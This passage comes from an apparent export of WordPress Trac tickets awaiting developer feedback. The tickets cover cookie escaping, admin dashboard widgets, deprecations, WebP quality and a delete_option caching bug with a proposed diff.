(/wp-admin/profile.php) and press ""Update Profile"". Wait 5 seconds and repeat. The value of wp-user_settings in the database and COOKIE is being double escaped (escaped on read and escaped on write). Therefore the value of wp-user_settings does this; - foo=1&bar=1 - foo=1&bar=1 - foo=1&ampbar=1 - foo=1&ampampbar=1 - and so forth Once the value of wp-user_settings becomes too long and/or combined with a user using the same browser with multiple logins, the length of the COOKIE(s) will become too large and the request header will be rejected by Apache/Nginx. " phatkoala Future Releases 42915 Don't load admin dashboard widgets if they're not shown Administration normal normal Awaiting Review enhancement new dev-feedback 2017-12-15T19:55:41Z 2020-02-15T13:08:37Z "I'm not sure how doable this is given that #23910 was closed, but some plugins load slow admin dashboard widgets that use HTTP API requests or else involve heavy db lookups and processing. (Yes, these plugins should be designed better.) Since this is the admin dashboard and not some other component that is heavily modified and reconfigured such as the post page and since #23910 was closed, would it be possible to require a page reload when an admin component is enabled (so that the page can be re-requested while calling the widget routine) instead of preloading all widgets and then simply hiding the unshown dashboard elements? Or perhaps #23910 could be revisited with consideration given to non-stock admin dashboard widgets that are not as ""no big deal"" as the ones that WP ships with out of the box." ComputerGuru Future Releases 11297 Don't email the admin when they create a user from the backend Users 2.9 low minor enhancement new dev-feedback 2009-12-01T12:05:31Z 2019-06-05T06:44:57Z "I just created the user myself. I already know I did it. I don't need to be told again. Emails should only be sent to the admin when a user registers themselves (if that is enabled). They shouldn't be sent when the admin manually creates a new user." caesarsgrunt Future Releases 59992 Document global $locale in wp-admin/options.php General normal normal Awaiting Review defect (bug) new dev-feedback 2023-11-30T13:42:55Z 2023-11-30T16:19:32Z "I have review the below file code and found the we are used a global locale variable. but they do not mention in function comment. So I think we need improve function comment code. File Names: wp-admin/options.php " upadalavipul Future Releases 52888 Docs: Update get_children function SergeyBiryukov Posts, Post Types normal minor Future Release enhancement reviewing dev-feedback 2021-03-23T01:38:42Z 2022-09-20T00:31:17Z get_children documentation is very confusing to read, an entire essay for what could be said in a single paragraph, so I've rewritten it. ribaricplusplus Future Releases 49678 do_action default first parameter Plugins 5.3.2 normal normal Awaiting Review defect (bug) new dev-feedback 2020-03-22T18:55:26Z 2020-05-04T17:19:49Z "This code looks like bug: we don't pass any parameters to action but the first parameter is passed anyway and have the value '' (empty string). Why? {{{#!php <?php add_action( 'action_name', function( $first ){ var_dump( $first ); } ); do_action( 'action_name' ); //> string(0) """" }}} " Tkama Future Releases 42012 Do not switch roles and capabilities when accessing options through `*_blog_option()` Options, Meta APIs normal normal Awaiting Review enhancement new dev-feedback 2017-09-27T21:51:32Z 2021-08-03T11:42:38Z "[41625] has outsourced the functionality to switch the current user's capabilities and available roles when sites are being switched, instead this now happens in `wp_switch_roles_and_user()` which is hooked into the `switch_blog` action. When accessing `get_blog_option()`, `add_blog_option()`, `update_blog_option()` or `delete_blog_option()`, it should be safe to always unhook the function temporarily (see `WP_Roles::get_roles_data()` for an example where it already happens manually in core) to improve performance, in some cases significantly. Roles and capabilities are not needed when accessing options, however we need to be careful and think about what plugins are possibly doing here. Let's discuss whether this can happen automatically in core or whether it should be left to developers." flixos90 Future Releases 57416 Do not split query if requesting one post spacedmonkey Query 3.0 normal normal Future Release enhancement assigned needs-unit-tests 2023-01-03T13:49:30Z 2023-11-16T12:36:42Z When using WP_Query and requesting posts_per_page = 1, there is little to no value in splitting the query and priming posts using _prime_post_caches. This results in one query to get the posts and another to prime it. This means two database queries when this could simply be one. spacedmonkey Future Releases 43869 Do not initialize current user too early in `get_user_locale()` SergeyBiryukov Bootstrap/Load normal normal Future Release defect (bug) reviewing dev-feedback 2018-04-26T13:58:48Z 2022-01-30T16:52:09Z "The current user in WordPress is typically initialized right before the `init` action, in `wp-settings.php`. While WordPress has measures in place to initialize the current user on request, this is rather unexpected and we should try to avoid it. There is one function in core that causes the current user to be initialized in such an unexpected way, namely the `get_user_locale()` function. It is at least called by `load_default_textdomain()` (after the `setup_theme` hook), but most times even earlier, when plugins call `load_plugin_textdomain()` (usually on `plugins_loaded`). Of course it's necessary to load the user-specific locale that early, so it's not an option to set it up later. However, it shouldn't be necessary for `get_user_locale()` to set the current user. * First of all, it doesn't need to access a full user object. Initializing a user object is a heavy process (unless the current user), and all we need to do here is look up a meta value for the `locale`, for which a user's ID is sufficient. * I suggest to do the following: If no `$user_id` is passed, call `get_current_user_id()` if we're at a point in the bootstrap flow where the current user is already set up. Otherwise, we can use the filter `determine_current_user` which is internally used by `_wp_get_current_user()` and returns the current user's ID on success. We might wanna consider centralizing that logic in a utility function." flixos90 Future Releases 46986 DNT Parameter automatically for Vimeo oEmbed requests garrett-eclipse* Embeds 4.9 normal major Future Release defect (bug) accepted dev-feedback 2019-04-18T21:28:42Z 2023-10-05T07:04:07Z "This is a follow-up to #41784. **Summary:** The “do not track” (?dnt=1) embed parameter is currently being automatically applied to all oEmbed requests for Vimeo videos, seemingly those embedded in self-hosted versions of WordPress only. We’ve traced this back to the change made to address this ticket #41784 (https://core.trac.wordpress.org/changeset/41345) The reason this is only coming up now is that Vimeo only just recently added oEmbed support for DNT- https://github.com/vimeo/player.js/pull/403 The issue with this WordPress change is that adding a DNT parameter to Vimeo embeds is intended to automatically block'' all'' tracking in the Vimeo player, including player statistics. Stats are a big feature of Vimeo which many users rely on, so adding this parameter is currently leading to user confusion when stats are not collected. Many users aren’t aware that this parameter is being added for them by WordPress, nor do they understand the implications. Vimeo support currently receives 1-2 support tickets from users a day who are affected by this change and unaware of the parameter being added by WordPress, and it's ability to disable stats. Documentation for the DNT parameter on Vimeo can be found here- https://vimeo.zendesk.com/hc/en-us/articles/360001494447-Using-Player-Parameters Example webpages with DNT: https://foodtv.dk/video/verdens-hurtigste-pastaret/ https://foodsthathealyoucbd.com/cbd-buyer-beware-know-what-youre-buying/ Check out this link for evidence of the DNT parameter in the iframe **Proposal:** WordPress should **not** automatically append the DNT parameter. Users should have the option to add DNT if they determine that it fits their needs. Note that unlike Twitter (which was mentioned in the initial report, the Vimeo player does not contain cookies which are unessential to player functionality (like saving language preferences or viewer statistics) It does not track 'non-essential' cookies like google analytics and other third party cookies (used for ad serving, etc). " djc71889 Future Releases 58312 Display password hint on additional screens Users 4.3 normal normal 6.6 enhancement new dev-feedback 2023-05-14T20:39:22Z 2024-02-12T15:00:40Z "In WordPress 4.1.0, the function `wp_get_password_hint` was introduced. This function returns a hint to display to the user when creating a new password. Currently, it is only used when user go through the ""Forget password"" steps. This ticket and the PR with it add the password hint to three screens, WordPress install screen, new user screen and user profile screen." petitphp Future Releases 39836 Display maximum file upload size on theme upload page Themes normal normal Awaiting Review enhancement new dev-feedback 2017-02-10T16:47:09Z 2017-06-25T04:06:02Z "When we click on 'Upload Theme' button, WordPress displays ""If you have a theme in a .zip format, you may install it by uploading it here."" message on /wp-admin/theme-install.php If we can displays maximum file size in this message, it will really help WordPress users. They will consider increasing upload file size in php.ini instead starting upload and displaying a message ""Are you sure want to do that?"" and if debug is true, they will also see error message." rinkuyadav999 Future Releases 59362 Display deprecated function usage in Site Health Site Health 6.3.1 normal normal Awaiting Review enhancement new dev-feedback 2023-09-15T09:17:44Z 2023-09-16T19:27:31Z "== Enhancement Request == === Summary === WordPress Site Health provides valuable information about the health and performance of a WordPress instance. However, it does not offer any insights into whether the instance is using deprecated functions, classes, constructors, hooks, file_includes, which can be crucial for maintaining the site's compatibility with future WordPress versions. This enhancement ticket proposes adding an additional check to Site Health that detects and displays information about any deprecated functions, classes, constructors, hooks, file_includes, being used within the WordPress instance. Adding a ""Deprecated Functions"" check to the Site Health tool will be a enhancement for WordPress administrators, helping them identify and replace deprecated functions, classes, constructors, hooks, file_includes, plugins, themes, ensuring the site's long-term stability and compatibility with upcoming WordPress updates. === Details === The deprecated function check should be integrated into the existing Site Health tool as follows: 1. Log: Log deprecated functions, classes, constructors, hooks, file_includes 2. Display Check Results: Under a ""Deprecated Functions"" check, display a list of deprecated functions, classes, constructors, hooks and file_includes used in the WordPress instance. Result should * include the function, class, constructor, hook or file_include name * the version in which it was deprecated * which Plugin or Theme called it, * when in was called the last time * a brief explanation of the recommended action. === Implementation Suggestions === * Utilize existing WordPress core functionality for detecting usage of deprecated functions * Add a action to 'deprecated_{[]}_run' that logs the usage of a deprecated functions * Use debug_backtrace() do indentify the source / code. * The check results should display the log entries with status 'recommended'. * Keep the log process ""stupid"" and put logic etc. into the check, to avoid complexity and potential crashes. === Challenges === * To provide the administrator with sufficient information so that they are capable of taking action. * Decision on how long entries stay in the log e.g. only show deprecated function calls of the last 30 days or allow the (administrative ) user to clear the log? * Should there be one check in Site Health of all kinds of deprecated? Or one for each? === Why It's Important === WordPress is constantly evolving, and maintaining compatibility with newer versions is crucial for security and performance reasons. Deprecated functions may be removed in future releases, causing issues for sites that rely on them. By providing this information in Site Health, WordPress can empower site administrators to keep their installations future proof. " Michi91 Future Releases 48641 Discussion: links that look like buttons (and vice versa) Administration normal normal Future Release enhancement new dev-feedback 2019-11-14T17:23:30Z 2021-03-04T21:51:54Z "''This issue has been moved from GitHub to Trac to increase visibility.'' Original GitHub discussion: https://github.com/WordPress/gutenberg/issues/7534#issuecomment-549980093 == Summary Sometimes, `<a>` elements are made to look like visual buttons to users, even though they are not actually using the `<button>` element. This can be problematic for some users. The reverse can also cause problems — `<button>` elements that look like links. This is less of a problem, because `<button>` elements should **not** use __underlined text__ styling. There needs to be some resolution or decision on this matter. ''To clarify, this is a visual/interaction issue''. It's less about whether the element technically works and more about the users' expectations around what will happen when they interact with an element. == Specific issues Here is a non-exhaustive list of potential problems: === `<button>` elements that look like links Again, I think the following issues could be solved easily because of what I stated above in the summary. - Users who right-click on the link would expect to see options in the context menu relating to links, such as Open in a new tab – which they would not see if that link was actually a button. - Users of dictation software who see the link on the page would expect to be able to trigger it by saying ‘click link save and return to overview’, which may not work if the link is actually a button. - Users of assistive technology would not see the link in their rotor / list of links, despite being able to see it on the page. === `<a>` elements that look like buttons - Pressing the Space key or Enter triggers a button, whereas pressing the Enter key only triggers a link. - Users of assistive technology may have problems interacting with the visual buttons if they are actually `<a>` elements (**would love clarification from an expert on this**). === `<a>` elements should always look like links (plain, __underlined text__) This is problematic because: - The interface calls for a primary action to look prominent. Links are inherently less prominent than buttons. - When related actions are grouped together, it's ideal to style them the same to show relation. Sometimes it's a mix of `<a>` and `<button>` elements. Simple links don’t always catch a user’s attention when they’re scanning a website. So a link is sometimes styled to look like a button where you want to give it greater prominence. Source: [https://href.li/?https://designsystem.gov.au/components/buttons/#links-as-buttons gov.uk] = Current solution I believe attempts have been made in the past to make links more visually more prominent without looking like a button: [[Image(http://cldup.com/PUWq1ghJb7.png)]] This is a commendable attempt, but in my opinion it still looks like a button, therefore the problem it attempts to solve still persists. Additionally, it creates a problem by introducing another type of visual ""button"" that is inconsistent with standard WordPress buttons. As we make `<a>` elements bigger and visually more prominent, I think they'll inevitably look close to a visual button. I understand they don't have to look like a button, but as you add more padding, and a background/outline to indicate click area, it immediately starts to look like a button. Any differences with a button will be subtle, and we'll probably still have some confusion with interactions. = Proposal Considering a11y and design concerns, and understanding there is no ""correct"" answer, I believe this is the optimal compromise: - ''Visual'' buttons should be able to use either the `<a>` or `<button>` element. This flexibility is provided so developers can make the most semantic markup possible. This also allows designers to ensure a consistent and usable visual experience. - `button` elements should **not** look like links (plain, __underlined text__). Additionally, we could provide a bit more affordance for `<a>` elements that look like visual buttons, by adding an icon to the right (similar to how we add an ""external"" icon to external links. [[Image(http://cldup.com/0fa8NiUWOZ.png)]] ---- Related discussions and prior work done on button/link semantics: - Enhancement: improve tertiary button styles: #48501 - https://core.trac.wordpress.org/ticket/40470#comment:11 - https://github.com/WordPress/gutenberg/issues/7534#issuecomment-510534529 - Semantic elements for non-link links: #26504 - https://core.trac.wordpress.org/query?keywords=~semantic-buttons" drw158 Future Releases 38630 Discourage usage of legacy properties in WP_Site Networks and Sites 4.5 low normal Future Release enhancement new dev-feedback 2016-11-02T21:21:20Z 2021-11-22T07:25:30Z "Working on #38597, it was figured out that the best solution for handling problems with IDE handling of `WP_Network`s magic ID property is to rename the actual properties to reflect our current naming conventions. This enhancement will encourage to use the new conventions while still supporting the old ones for legacy code. Let's do the same for `WP_Site`: * `$blog_id` (string) is replaced with `$id` (int) * `$site_id` (string) is replaced with `$network_id` (int) * both legacy names will continue to work through magic methods" flixos90 Future Releases 38207 Disable Trackbacks by Default Keep Pingbacks On Pings/Trackbacks low minor Awaiting Review enhancement new dev-feedback 2016-10-01T19:21:01Z 2017-03-07T23:23:29Z "Trackback is a manual technology. Pingback is an automated technology(automatically pings sites linked to in post content). The question comes from me as the component maintainer and I'm opening this as a place for if the proliferation of Trackback Spam and the manual requirement has made it worth disabling the receipt and/or sending of trackbacks by default while leaving pingbacks enabled. I continue to be committed to pingback and the concept in general, but I have to ask regarding the interest in trackback. I'm putting out a call for comment in this regard. The only recent trackback related requests involve expensive queries to send trackbacks(See #36824). Related #37007." dshanske Future Releases 50188 Disable Media uploader if PHP file_uploads is disabled Upload normal minor Awaiting Review enhancement new dev-feedback 2020-05-16T19:32:36Z 2024-01-24T09:26:51Z "Based on ticket #50038, if the PHP configuration is {{{file_uploads = Off}}} we should disable the Media upload. Actually, when you upload a file and the file_uploads is disabled, WordPress uploads the file with a progress bar and, at the end, it gives an error because is disabled. This should affect the Media upload, probably it should tell something like ""You can't upload a file, please check the Site Health for more information"" (or something like that) but also, in any file upload (like the Image / Video / Audio on Gutenberg) should allow to pick from the media but not show the upload button, also the plugin / theme upload." JavierCasares Future Releases 57385 Disable foreign key checks when dropping tables inside wp_uninitialize_site() function johnjamesjacoby* Database normal normal Awaiting Review defect (bug) accepted changes-requested 2022-12-24T15:01:09Z 2024-01-12T18:07:05Z "By default when removing the tables from a subsite, if the table has foreign key constraint it wont drop the table resulting in tables not being removed. so this line should be changed from this to {{{ foreach ( (array) $drop_tables as $table ) { $wpdb->query( ""DROP TABLE IF EXISTS `$table`"" ); // phpcs:ignore WordPress.DB.PreparedSQL.NotPrepared } }}} {{{#!php <?php $wpdb->query('SET FOREIGN_KEY_CHECKS=0;'); foreach ( (array) $drop_tables as $table ) { $wpdb->query( ""DROP TABLE IF EXISTS `$table`"" ); // phpcs:ignore WordPress.DB.PreparedSQL.NotPrepared } $wpdb->query('SET FOREIGN_KEY_CHECKS=1;'); }}} or any other better alternative." naveen17797 Future Releases 41520 Disable deprecated functions Bootstrap/Load normal normal Awaiting Review enhancement new dev-feedback 2017-08-01T20:16:06Z 2020-04-20T09:13:07Z In bootstrap process, deprecated.php, pluggable-deprecated.php and ms-deprecated.php are includes. These files include all the deprecated functions in core. This is done for compatibility reasons, however there are many setups that do not requires these functions as they are not using any of these functions. These files inline over 4500 lines of code ( 3881 + 208 + 518 ). There should be an option to disable them. spacedmonkey Future Releases 48050 Development Build: Provide structure to auto-install plugins Build/Test Tools normal normal Awaiting Review enhancement new dev-feedback 2019-09-16T16:39:11Z 2019-09-17T19:53:34Z "When doing local development, I never use a completely blank version of WordPress. I always install a plugin like Query Monitor to help me debug and monitor development on the fly. Additionally, for some themes and plugin development, a developer may always or often need particular plugins installed. I propose automatically installing Query Monitor (FYI @johnbillion ) for Core development while also creating a structure to allow other developers using this box for other types of work to define as an environmental variable other options. I suggest only installing, not activating, to ensure that the running code is intentional as compared to the pristine environment. In our Travis config, for tests, we should not have anything different than a production build, so a `false` variable will disable anything from being installed. For other uses, a comma-separated list would provide a way to install multiple plugins. cc: @pento" kraftbj Future Releases 54356 Determine and apply best default quality settings for WebP images adamsilverstein Media 5.8 normal normal Future Release enhancement assigned dev-feedback 2021-11-01T16:21:18Z 2023-01-19T06:45:51Z "In ticket:35725 we added core support for the WebP image format. On the ticket, we discussed studying the best compression level (""quality"") setting to use for WebP images ([https://core.trac.wordpress.org/ticket/35725#comment:152 comment 152], [https://core.trac.wordpress.org/ticket/35725#comment:124 comment 124], [https://core.trac.wordpress.org/ticket/35725#comment:117 comment 117], [https://core.trac.wordpress.org/ticket/35725#comment:101 comment 101]). In the end we decided to use the same default quality as JPEG images use for our initial pass. However, given the differences between the formats (and in anticipation of even newer formats), we should consider what the best default quality setting would be for WebP images. Some details on how we can test compression settings and arrive at an ideal level are [https://developers.google.com/speed/webp/docs/webp_study outlined in this post]. Related: #53669 " adamsilverstein Future Releases 21913 Detecting MIME Types in WXR Files Import 3.4.2 normal normal enhancement new dev-feedback 2012-09-17T21:09:07Z 2019-06-04T20:03:48Z "In the process of creating a service to convert TypePad data to WXR formatted files, we've encountered some unique problems with TypePad data. Namely, many TypePad files are saved without file extensions, which prevents the existing importer from importing those files into the wp-content/uploads folder. In order to import and rename these otherwise ignored files, we've created a patch for the WordPress importer that does the following: 1. If there is an attachment in the WXR and the importer is not able to determine the file type from the file name (ie missing extension), the patched version will make a light (body-less) request to the web server where the file is hosted for information we can use about the file. The things we're interested in are file type, size, and filename. 2. If the importer is processing an attachment under the above situation, and it is able to determine the file type, then it will rewrite the local version of the file to have the appropriate file extension. This is a simple bit of code, but it makes a huge difference as TypePad saves without file extensions quite regularly. We've attached our patch and a sample WXR file from ragsgupta.com, the Brightcove co-founder's blog." ReadyMadeWeb Future Releases 6778 Detect when the config will cause infinite loop Permalinks 2.5 normal normal Future Release enhancement reopened dev-feedback 2008-04-19T13:46:14Z 2019-03-15T00:34:39Z "Behavior: If you put in http://www.domain.com in the ""Wordpress Address"" setting, then Wordpress will automatically do a redirect from http://domain.com to http://www.domain.com. Many hosting packages allow the user to deal with www and non-www versions of their domain. This will cause an infinite redirect loop if, for example, the ""Wordpress Address"" is set to http://www.domain.com and the hosting setting is set remove the www from the domain address-- to redirect http://www.domain.com to http://domain.com. Expected behavior: When setting the ""Wordpress Address"" setting, it should detect if the canocical code will cause an infinite redirect loop and warn/correct the mistake" Analogpoint Future Releases 28988 Detect Time Zones automatically at installation Date/Time normal normal Awaiting Review enhancement new dev-feedback 2014-07-22T19:19:50Z 2021-05-05T19:04:34Z "Currently, upon installing WordPress, one of the steps I always take is to go to Settings > General > Timezone to manually set my time zone. I've been using Wordpress for eight years, so I know to do it and how to do it, and it's just a minor inconvenience. However, I have seen people new to this platform be confused and/or not know how to change this. Is it technologically possible to use a geolocation service to query the IP address of the computer installing Wordpress and automatically set that service's best guess as to time zone, perhaps during the setup process? I would envision the UI option remaining in settings, in case, for example, a developer in one time zone builds a site for a client in another. But automatic detection would be perfect for the average new user. It would be one more element that just works out of the box for those who aren't particularly tech savvy. I did some searching in Trac to see if I could find a similar ticket and couldn't find any." danielmount Future Releases 59631 Despite using Update URI Plugin header, WP still tries to fetch the Update notes from WP org Plugins 5.8 normal normal Awaiting Review defect (bug) new dev-feedback 2023-10-16T05:17:22Z 2023-12-06T02:33:02Z "Despite setting a [https://make.wordpress.org/core/2021/06/29/introducing-update-uri-plugin-header-in-wordpress-5-8/ Plugin Header] Update URI directive WP still will try to fetch the Update information (changelog) from a WP Org plugin. And when filtering the url with [https://developer.wordpress.org/reference/hooks/update_plugins_hostname/ update_plugins_{hostname}] , it will simply load an instance of the ""Add new plugin"" screen in the ThickBox loaded when clicking ""View version vx.x.x details"" I am quite sure I do not miss anything, as I read through all the (undocumented) new feature announcements. This is a minimal approach you need to replicate the issue: - Update plugin header directive to use `Update URI: https://domain.tld` - Either hook into `update_plugins_{hostname}` and pass a version higher than your currently installed one, **or** - Hook into `pre_set_site_transient_update_plugins` and pass a new `new_version` higher than your currently installed one Of course make sure you do actually have a remote update to be shown. ==> You could also just edit the database entry of `_site_transient_update_plugins` to trigger the ""has update"" alert in the plugins list... All this makes the `Update URI` pretty much dysfunctional (in the sense that it is not really useful at all) and the developer still needs to manually filter the ThickBox content for the ""View update details"" or even for the ""Plugin details"". And the documentation about all this is either inexistent or very limited (opened a separate issue about that [https://github.com/WordPress/Documentation-Issue-Tracker/issues/1194 here] IMO, passing a custom Update URI should completely unhook all Callisto the WP Org Api and either not allow to ""view details"" at all, or at least provide some ways to populate that window with custom details (or at least read from the plugin data, which it does not: it reads from remote)." bedas Future Releases 51249 design issue under customize input box for Schedule in 5.5.1 Customize normal normal Future Release defect (bug) new dev-feedback 2020-09-05T09:43:54Z 2020-11-17T16:08:13Z "I have found a design issue in Schedule your customization changes to publish. Need improvement for design under the customize input box of Schedule. " rkradadiya Future Releases 56512 Design glitch in calendar block control with align left and right(Frontend) Themes 6.0.2 normal normal Awaiting Review defect (bug) new dev-feedback 2022-09-05T09:55:06Z 2022-09-05T12:42:49Z "I've noticed that when I add the calendar block (without any other blocks) with the align left or right control in backend, the calendar displays inline with the footer. But instead of a calendar, I added a latest post block with an align left control, and it looks fine. Would you please verify. latest post block: https://tinyurl.com/2le537ry calendar : https://tinyurl.com/2lyxklye WordPress Version: 6.0.2 Active Theme: TwentyTwentyTwo " bisnusnr Future Releases 60001 Deprioritize categories Editor normal normal Awaiting Review enhancement new dev-feedback 2023-12-01T19:26:44Z 2024-02-14T00:08:28Z "In the old days of blogging, we used categories. Nice, hierarchical structures which we all understood how they worked. However, as I was recently discussing the many issues around tags and categories with @matt, he made a strong point: people coming into blogging these days might understand tags a whole lot better than categories. We also agreed that the fact that by default, WordPress ships with two taxonomies, (categories and tags), is less than ideal from a new user UX perspective. So I'm proposing a change (for which @matt should actually get credit as he said it first in our conversation): we should (slowly) deprioritize categories. To start, on the pre-publish checks, we should not suggest people add a category to their post if they've never done so, or if they only have posts in the ""Uncategorized"" category. I'd also suggest removing the Categories panel if that's the case. Would love to hear other opinions, or see implementations :)" joostdevalk Future Releases 56160 Deprecate wp_sanitize_redirect Security 2.3 normal normal Awaiting Review enhancement new dev-feedback 2022-07-06T12:29:53Z 2024-02-07T19:42:15Z "All places that currently use it are better served with esc_url_raw and there seems to be no correct usage of it anywhere (most plugins use it where esc_url_raw should be used instead). I'm happy to provide a PR, I just need to get some heads up about how the deprecation process works in WP exactly." malthert Future Releases 26895 Deprecate recently_edited option Options, Meta APIs 3.8 normal minor enhancement new dev-feedback 2014-01-21T08:33:53Z 2019-06-04T20:45:22Z "recently_edited option is being set when a plugin or a theme file is edited by the builtin Editor. A search, in the WordPress 3.8 source code, tells me that the option is never being read. I suggest that we deprecate that option and replace it by an action where plugins can hook and get the value of the edited file." yani.iliev Future Releases 35656 Deprecate old single (non-multi) widgets Widgets 2.8 normal normal Future Release enhancement new dev-feedback 2016-01-29T08:52:23Z 2021-08-25T01:28:32Z "Widgets were introduced to Core in 2.2. These initial widgets only allowed one instance of a given widget to be registered at a given time. In 2.8 the `WP_Widget` was introduced which allowed for multiple instances of a widget type to be added, but more importantly it introduced an object-oriented MVC-ish paradigm for representing widgets. The `WP_Widget::update()` callback allows for a given widget instance to be sanitized without having to actually save it to the database. This ability is key for previewing widgets in the Customizer. In addition to the `update` callback, the `WP_Widget` can have schema information attached which works in conjunction with `update` to sanitize and validate a given widget for the REST API, for automatically generating a widget form, and automatically providing default values for a widget instance (see #35574). All of this is not possible with the old single widgets. I believe it is time to deprecate old single widgets so that widgets can evolve. If support for old single widgets is removed in 4.5, then in 4.6 (or later) support can be removed which could clean up quite a bit of the widgets codebase, including the brittle “option transactions” functionality that was added to widgets in the Customizer. Once single widgets are removed, moving widgets from being stored in options to a custom post type will be facilitated: #35669." westonruter Future Releases 20070 Deprecate Blogger XML-RPC Methods XML-RPC 3.3 normal normal Future Release enhancement new dev-feedback 2012-02-18T18:32:26Z 2020-09-21T19:41:58Z "The XML-RPC API supports the legacy Blogger API methods, but these methods have apparently not been very well tested or maintained. Given that the `wp.*` XML-RPC namespace now covers everything that the Blogger API does, I suggest the blogger methods be officially deprecated with an eye towards removing them in a future version. At the very least, the MetaWeblog API should be used by clients instead, as it was explicitly designed to enhance and supersede the Blogger API." maxcutler Future Releases 38073 Deprecate and replace wp_reset_vars() davideferre General 4.9 normal normal Awaiting Review enhancement assigned dev-feedback 2016-09-16T12:34:35Z 2021-09-01T10:18:46Z "`wp_reset_vars()` sets global variables based on `$_POST` and `$_GET` values. The function is used around 20 times in core and in my opinion this should be zero. Even better, the function should be deprecated. Why? First of all, it's easy to shoot yourself in the foot if you forget to properly sanitize the input value. Second, globals set by `wp_reset_vars()` aren't explicitly globalized in the files / functions using it. You might stumble upon code like this: {{{#!php <?php wp_reset_vars( array( 'foo', 'bar' ) ); // 100 lines further down… // Where do these come from?! echo $foo; echo $bar; }}} And of course using globals is bad. It's not testable and should be avoided if possible. Sanitized `$_GET` / `$_POST` values should be used directly instead. Related: #33837, #37699" swissspidy Future Releases 21432 Deprecate *_blog_option() Options, Meta APIs 3.4.1 normal normal Future Release defect (bug) assigned dev-feedback 2012-07-31T21:53:06Z 2017-06-26T17:58:41Z "Deprecate get_blog_option(), add_blog_option(), update_blog_option(), and delete_blog_option(). The regular *_option() functions wrapped with switch_to_blog() and restore_current_blog() should be used instead. Previous discussion: http://core.trac.wordpress.org/ticket/21270#comment:11" ryan Future Releases 38899 Deletion of auto-drafts and trashed posts never gets scheduled unless user accesses admin pages westonruter* Administration normal normal Future Release defect (bug) accepted dev-feedback 2016-11-22T03:55:27Z 2021-06-07T09:58:35Z "As [https://core.trac.wordpress.org/ticket/38615#comment:37 noted] in #38615: It turns out that the cron event that does `wp_delete_auto_drafts()` is only scheduled when a user lands on `post-new.php`: {{{#!php <?php // Schedule auto-draft cleanup if ( ! wp_next_scheduled( 'wp_scheduled_auto_draft_delete' ) ) wp_schedule_event( time(), 'daily', 'wp_scheduled_auto_draft_delete' ); }}} This logic should be added to `WP_Customize_Manager` as well so that these starter content auto-draft posts will get garbage collected (as well as the unpublished `customize_changeset` posts themselves) will get garbage-collected in the rare case where a user never goes to `post-new.php` on a given install. A user never visiting `post-new.php` is entirely possible if the user does all of their site management in the customizer or via the REST API. What's more is that the scheduling of trash deletion is also dependent on the user first accessing the admin, as `wp-admin/admin.php` contains: {{{#!php <?php // Schedule trash collection if ( ! wp_next_scheduled( 'wp_scheduled_delete' ) && ! wp_installing() ) wp_schedule_event(time(), 'daily', 'wp_scheduled_delete'); }}} So as such, this is also a concern for purely headless WP installs that make use of the REST API exclusively. If a site gets installed headlessly (e.g. via WP-CLI) and the admin is never accessed, then neither trashed posts nor auto-draft posts will never get deleted because they are never scheduled." westonruter Future Releases 26195 Deleting users asks for reassigning posts even when there is no post/comment Users 3.7.1 normal normal enhancement new dev-feedback 2013-11-24T14:35:55Z 2019-06-05T06:39:36Z "When deleting a single user or bulk deleting users, the confirmation page asks what should be done with the posts of the user. However, this question should not be displayed, if the sum of the posts of these user(s) is 0. Then, the delete button should become immediately active. This change would make deletion safer, as ""real"" users would be less likely to be deleted in error. Recommended user interface: - No posts present: ""This user/these users have no post"", followed by an active ""delete users"" button - Posts present: ""This user/theses users have a total of [number] posts"", followed by the current delete/assign query. " MarcelWaldvogel Future Releases 52798 delete_option() does not clear cache if option is missing in database. Options, Meta APIs 2.1 normal minor Awaiting Review defect (bug) new dev-feedback 2021-03-12T19:31:51Z 2021-07-19T02:10:10Z "It's an old one, but this is the mirror of #25015. If, for some reason, an object does not exist in the database, but does exist in persistent object cache, calling `delete_option()` will fail and the cached option will continue to exist: {{{ wp> get_option( 'test-option' ); => bool(false) wp> update_option( 'test-option', 'example', false ); => bool(true) wp> get_option( 'test-option' ); => string(7) ""example"" wp> global $wpdb; wp> $wpdb->get_results( 'SELECT * FROM wp_options WHERE option_name=""test-option""' ); => array(1) { [0]=> object(stdClass)#1977 (4) { [""option_id""]=> string(3) ""121"" [""option_name""]=> string(11) ""test-option"" [""option_value""]=> string(7) ""example"" [""autoload""]=> string(2) ""no"" } } wp> $wpdb->delete( $wpdb->options, array( 'option_name' => 'test-option' ) ); => int(1) wp> $wpdb->get_results( 'SELECT * FROM wp_options WHERE option_name=""test-option""' ); => array(0) { } wp> get_option( 'test-option' ); => string(7) ""example"" wp> delete_option( 'test-option' ); => bool(false) wp> get_option( 'test-option' ); => string(7) ""example"" }}} I know what you're thinking, ""Don't ever delete directly on the database."" But recently when I ran into this, manual deletion wasn't the cause. More than likely it was some sort of race condition between distributed database or cache servers, or other arcane edge cases. The end result though was that the cache and database were out of sync and subsequent automated `delete_option()` calls were silently failing to clear the cache. The easiest solution would be to move the cache deletion before the database check: {{{ diff --git a/src/wp-includes/option.php b/src/wp-includes/option.php index 8692db7199..2f4a000ca1 100644 --- a/src/wp-includes/option.php +++ b/src/wp-includes/option.php @@ -648,6 +648,18 @@ function delete_option( $option ) { wp_protect_special_option( $option ); + if ( ! wp_installing() ) { + if ( 'yes' === $row->autoload ) { + $alloptions = wp_load_alloptions( true ); + if ( is_array( $alloptions ) && isset( $alloptions[ $option ] ) ) { + unset( $alloptions[ $option ] ); + wp_cache_set( 'alloptions', $alloptions, 'options' ); + } + } else { + wp_cache_delete( $option, 'options' ); + } + } + // Get the ID, if no ID then return. $row = $wpdb->get_row( $wpdb->prepare( ""SELECT autoload FROM $wpdb->options WHERE option_name = %s"", $option ) ); if ( is_null( $row ) ) { @@ -665,18 +677,6 @@ function delete_option( $option ) { $result = $wpdb->delete( $wpdb->options, array( 'option_name' => $option ) ); - if ( ! wp_installing() ) { - if ( 'yes' === $row->autoload ) { - $alloptions = wp_load_alloptions( true ); - if ( is_array( $alloptions ) && isset( $alloptions[ $option ] ) ) { - unset( $alloptions[ $option ] ); - wp_cache_set( 'alloptions', $alloptions, 'options' ); - } - } else { - wp_cache_delete( $option, 'options' ); - } - } - if ( $result ) { /** }}} but that's also before the `delete_option` hook. Instead, the cache purging logic block could be duplicated right before returning `false`: {{{ diff --git a/src/wp-includes/option.php b/src/wp-includes/option.php index 8692db7199..ab0a3f79f2 100644 --- a/src/wp-includes/option.php +++ b/src/wp-includes/option.php @@ -651,6 +651,19 @@ function delete_option( $option ) { // Get the ID, if no ID then return. $row = $wpdb->get_row( $wpdb->prepare( ""SELECT autoload FROM 